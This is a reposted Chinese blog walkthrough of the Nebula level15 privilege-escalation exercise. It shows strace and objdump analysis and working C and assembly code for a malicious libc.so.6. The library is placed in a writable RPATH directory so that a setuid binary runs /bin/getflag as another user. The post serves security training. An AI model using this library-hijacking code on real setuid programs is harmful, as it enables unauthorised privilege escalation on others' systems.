linux漏洞挖掘nebula,Linux下的动态链接库包含漏洞

最新推荐文章于 2023-08-09 17:57:24 发布
转载 最新推荐文章于 2023-08-09 17:57:24 发布 · 357 阅读 · 0
文章标签:

#linux漏洞挖掘nebula

这篇博客详细介绍了如何利用Linux下的提权漏洞,特别是针对一个名为flag15sh的setuid程序。通过动态链接库劫持,创建自定义的libc.so.6,利用程序的RPATH特性,实现从level15用户权限提升到flag15用户,并执行/bin/getflag。过程中涉及了strace分析、程序头信息检查、动态链接库版本问题解决以及通过构造函数或替换__libc_start_main函数实现提权。最终,通过静态链接库编译或汇编语言编写system函数成功绕过错误,成功执行getflag。

说明

Nebula是一个用于Linux下提权漏洞练习的虚拟机,其第15关Level15提供了这样一个有漏洞的程序flag15sh-4.2$ ls -l

total 7

-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15

sh-4.2$ whoami

level15

要求利用该setuid程序的漏洞,从用户level15提权到用户flag15,执行/bin/getflag.

2. 漏洞挖掘

这道题是一个经典的动态链接库劫持题目,首先用strace观察flag15execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0

brk(0)                                  = 0x880e000

access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)

5/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)

open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)

open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)

open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)

open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)

open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file

...

open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3

...

exit_group(63)                          = ?

发现该程序链接到名为libc.so.6的动态链接库,但是/var/tmp目录对当前用户(level15)可写,因此可以在该目录下编写一个定制的libc.so.6,供程序flag15链接

我们进一步查看flag15的头信息,发现其确实依赖lib.so.6,并且使用RPATH编译,这表明flag15在运行时搜索包含动态链接库的路径/var/tmp/flag15,而且允许setuid执行(以LD_PRELOAD编译则不允许setuid执行).sh-4.2$ objdump -p /home/flag15/flag15

/home/flag15/flag15:     file format elf32-i386

Program Header:

PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2

filesz 0x00000120 memsz 0x00000120 flags r-x

INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0

filesz 0x00000013 memsz 0x00000013 flags r--

LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12

filesz 0x000005d4 memsz 0x000005d4 flags r-x

LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12

filesz 0x00000108 memsz 0x00000110 flags rw-

DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2

filesz 0x000000d0 memsz 0x000000d0 flags rw-

NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2

filesz 0x00000044 memsz 0x00000044 flags r--

EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2

filesz 0x00000034 memsz 0x00000034 flags r--

STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2

filesz 0x00000000 memsz 0x00000000 flags rw-

RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0

filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:

NEEDED               libc.so.6

RPATH                /var/tmp/flag15

INIT                 0x080482c0

FINI                 0x080484ac

GNU_HASH             0x080481ac

STRTAB               0x0804821c

SYMTAB               0x080481cc

STRSZ                0x0000005a

SYMENT               0x00000010

DEBUG                0x00000000

PLTGOT               0x08049ff4

PLTRELSZ             0x00000018

PLTREL               0x00000011

JMPREL               0x080482a8

REL                  0x080482a0

RELSZ                0x00000008

RELENT               0x00000008

VERNEED              0x08048280

VERNEEDNUM           0x00000001

VERSYM               0x08048276

Version References:

required from libc.so.6:

0x0d696910 0x00 02 GLIBC_2.0

3. 漏洞利用

剩下的事就是要在/var/tmp/flag15目录下编写我们定制的libc.so.6,劫持flag15,提权运行/bin/getflag.

首先要hook flag15运行时用到的函数,这里有两个点可供选择.一是通过gcc 的__attribute ((constructor))修饰符声明自己的函数,这个函数可以在linux动态链接库入口_init 函数之前完成提权功能;二是在int __libc_start_main函数中加入自己的提权功能.

使用第一种方法编写:sh-4.2$ cat constructor.c

#include 

void __attribute ((constructor)) init()

{

system("/bin/getflag");

}

编译gcc -shared -fPIC -o libc.so.6 constructor.c

第二种方法编写sh-4.2$ cat shell.c

#include 

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end)

{

system("/bin/getflag");

}

编译gcc -shared -fPIC -o libc.so.6 shell.c

得到libc.so.6

然后执行sh-4.2$ /home/flag15/flag15

/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)

/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)

/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)

/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference

从上面提示的重定位错误,发现缺少一个_cxa_finalize函数,于是在上述两种方法中的constructor.c或者shell.c中都可以增加void __cxa_finalize(void)

{

return;

}

修改constructor.c为contructor1.c,然后再次编译sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c

然后执行sh-4.2$ /home/flag15/flag15

/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)

/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)

/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

上面提示又缺少GLIBC的version信息。于是我们提供一个version script在编译时使用

继续编译并执行sh-4.2$ cat version

GLIBC_2.0 {};

sh-4.2$  gcc -shared -fPIC -o libc.so.6   contructor1.c -Wl,--version-script=version

sh-4.2$ /home/flag15/flag15

/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

仍然提示出错,似乎在链接时没有找到system函数.下面也有两种方法来解决,一种是用静态链接库的方式编译来满足所有的依赖关系(why?),二是用汇编语言编写自己的system函数

第一种方法:sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c

sh-4.2$ /home/flag15/flag15

You have successfully executed getflag on a target account

/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

第二种方法:sh-4.2$ cat shell.c

#include 

void __cxa_finalize(void *d) {

}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {

system();

}sh-4.2$ cat system.s

.section .text

.globl system

system:

mov $getflag, %ebx

xor %edx, %edx

push %edx

push %ebx

mov %esp,%ecx

mov $11, %eax ;execve系统调用

int $0x80

.section .data

getflag: .ascii "/bin/getflag\0"

sh-4.2$  gcc -shared -fPIC -o libc.so.6   shell.c system.s  -Wl,--version-script=version

sh-4.2$ /home/flag15/flag15

You have successfully executed getflag on a target account

个人认为编写shellcode的方法相对于静态链接库编译的方式更易于理解,目前自己还没有弄清楚为什么用静态链接的方式就能解决system函数的问题.

参考

eric孙
关注
图数据库nebula——搭建linux单机Nebula
LSY_优快云_的博客
09-02 2644
目录 1、下载rpm软件包: ​2、上传rpm软件包: 3、执行rpm软件包: 4、修改服务器最大打开文件数: 5、操作nebula服务: (1)启动nebula服务: (2)查看nebula服务: (3)停止nebula服务: 6、控制台连接nebula: (1)下载nebula-console软件包: (2)上传nebula-console软件包: (3)授权nebula-console: (4)连接nebula服务端: 1、下载rpm软件包: 下载需要版本的rpm软件包.
nebula-console-linux-amd64-v2.0.0-ga
08-07
图数据库nebula的官方控制台console版本2.0.0的软件包
动态链接库的静态链接导致程序的DLL劫持漏洞-借助QQ程序xGraphic32.dll描述
Less Is More
12-19 1万+
动态链接库的静态链接导致程序的DLL劫持漏洞 借助QQ程序xGraphic32.dll描述   不想啰嗦这么多了,直接开题。   一、       库 首先明确一下库的概念,库里存放的都是二进制编码。纵观编程技术的发展路线,可以看到一条清晰的发展脉络:代码>静态库>动态库。 假如我们要编写一个程序叫做Calc.exe,而现在有现成的库,库里面存放的是已经编译好的函数Add(),Sub
Linux下的动态链接库包含漏洞
weixin_33717298的博客
10-26 246
说明Nebula是一个用于Linux下提权漏洞练习的虚拟机,其第15关Level15提供了这样一个有漏洞的程序flag15sh-4.2$ls-l total7 -rwsr-x---1flag15level1571612011-11-2021:22flag15 sh-4.2$whoami level15要求利用该setuid程序的漏洞,从用户level1...
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
linux漏洞挖掘nebula,Exploit-Exercises-Nebula
weixin_30830161的博客
05-16 357
这关给了一个Perl写的CGI程序,根据thttpd.conf的配置可知该CGI程序监听的1616端口。在虚拟机畅通的情况下直接通过http://192.168.56.101:1616/index.cgi 访问(192.168.56.101是我自己配置的IP地址,读者需要自己配置)。index.cgi的代码如下:#!/usr/bin/env perluse CGI qw{param};print ...
Linux 动态链接库 - dll劫持
banmi9580的博客
10-09 435
如何使用动态链接库 Linux下打开使用动态链接库需要三步(实际上和windows下基本一样):1.加载动态链接库,通过调用库函数dlopen()获得链接库的句柄,对应于windows下的 AfxLoadLibrary函数 //参数一filename是.so文件路径 //参数二flag指定解析符号的时间点等 //返回值是链接库的句柄 ...
linux ubuntu安装nebula
最新发布
07-23
在Ubuntu系统上安装Nebula Graph,可以通过源码编译安装或使用Helm Chart进行部署。以下分别介绍这两种方法: ### 方法一:通过源码编译安装 1. **安装依赖项** 在开始编译之前,需要安装必要的依赖库和工具。...
docker-compose部署arm架构的nebula3.6版本
05-30
这些文件通常包含了启动Nebula Graph服务所需的所有配置信息,包括但不限于Nebula Graph服务的镜像名称、端口映射、环境变量设置等。 当我们下载了docker-compose文件后,下一步是通过docker load命令加载Nebula ...
从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点
giantbranch的专栏
03-25 1820
从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点第一次使用markdown进行写文章,其实如果markdown编辑器支持qq截图直接粘贴就好了我觉学习了就应该有个总结,这样才会更加的牢固 Exploit Exercises Nebula level00-19 学习记录搜索setuid/setgid的程序搜索一个setuid的程序,我们可以根据它的用户i
警惕利用Linux预加载型恶意动态链接库的后门
cleanfield的专栏
01-17 2765
一、动态链接库预加载型rootkit概述 动态链接库预加载机制是系统提供给用户运行自定义动态链接库的一种方式,在可执行程序运行之前就会预先加载用户定义的动态链接库的一种技术,这种技术可以重写系统的库函数,只需要在预加载的链接库中重新定义相同名称的库函数,程序调用库函数时,重新定义的函数即会短路正常的库函数,这种技术可以用来重写系统中有漏洞的库函数,达到修复漏洞的目的,如get_host_byname导致ghost漏洞的这类函数。这种技术也可以被不怀好意的攻击者用来写rootkit,通过重写mkdir, m
记一次解决glibc库版本兼容问题
读研功夫
10-13 1万+
记一次解决glibc库版本兼容问题 问题背景: 本地编译的动态共享库(.so)在另外一台服务器上编译链接报错 报错信息如下: /lib64/libc.so.6: version ‘GLIBC_2.14’ not found(require ./libsmscrypt.so) symbol memcpy, version GLIBC_2.14 not defined in file libc.so.6 with link time reference 原因分析: 根据报错信息可以看出so库中memcpy函数使
relocation error 问题解决
热门推荐
m0_37786726的博客
04-02 3万+
centos问题:relocation error: /lib64/librt.so.1: symbol __clock_getcpuclockid, version GLIBC_PRIVATE not defined in file libc.so.6 with link time reference解决方法:步骤一.libc问题,先看看你是改动了哪个libc**.so 库二.查找出你原来该库的...
技巧:多共享动态库中同名对象重复析构问题的解决方法
yuyin86的专栏
08-24 1408
技巧:多共享动态库中同名对象重复析构问题的解决方法 共享库与静态成员 吴 光远, 软件工程师, IBM 孟 先涛, 软件工程师, IBM 简介: Linux 平台下的共享动态库,一般都是通过选项“-fPIC”编译出来。有些应用程序需要链接多个共享库,此时如果在这些共享库中存在相同作用域范围的同名静态成员变量,那么当程序访问完静态成员变量结束析构时,由于内存的 d
Linux C反汇编
chidaoqi1607的博客
05-21 938
一、有.c源文件(基于gcc) asm.c #include <stdio.h> int main() { int n = 1; int m = 2; int p = m + n; printf("p:%d\n", p); return 0; } 使用gcc的-S功能 gcc -S -o asm.s asm.c 生成的汇编文件asm.s .file "asm.c" .text .section .rodata .LC0:
记录一次莫名其妙的堆栈溢出
heyJoie的博客
09-03 505
前两天写的代码传git后,当时做了基础的功能验证。今天从git上新拉下来编出来的库,替换到我的运行环境中,当我用ctrl+c终止进程时,出现了堆栈溢出错误: C[System] [227197] [CLogToFile::~CLogToFile:1] [17:41:30,12111940] program log end *** Error in `./VASSdkDemo': corrupted...
linux程序保护机制&gcc编译选项
weixin_42692164的博客
08-09 1888
PIE是一种可执行文件格式,它可以在内存中加载的任何地址上执行,而不依赖于固定的基地址。栈的大小是固定的,并且在程序运行期间是动态变化的。要在编译过程中启用 -z noexecstack 选项,您需要使用兼容的编译器,如GCC,并将选项作为命令行参数传递。如果这些节存在,则说明-pie参数已经生效,并且程序是以位置无关的方式编译的。代码段是被标记为可执行的,程序从代码段中获取指令并执行。具体来说,-pie参数用于生成位置无关的可执行文件,而位置无关的可执行文件通常与动态链接配合使用。
linux下动态链接过程
leapmotion的博客
06-11 1966
elf文件动态链接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值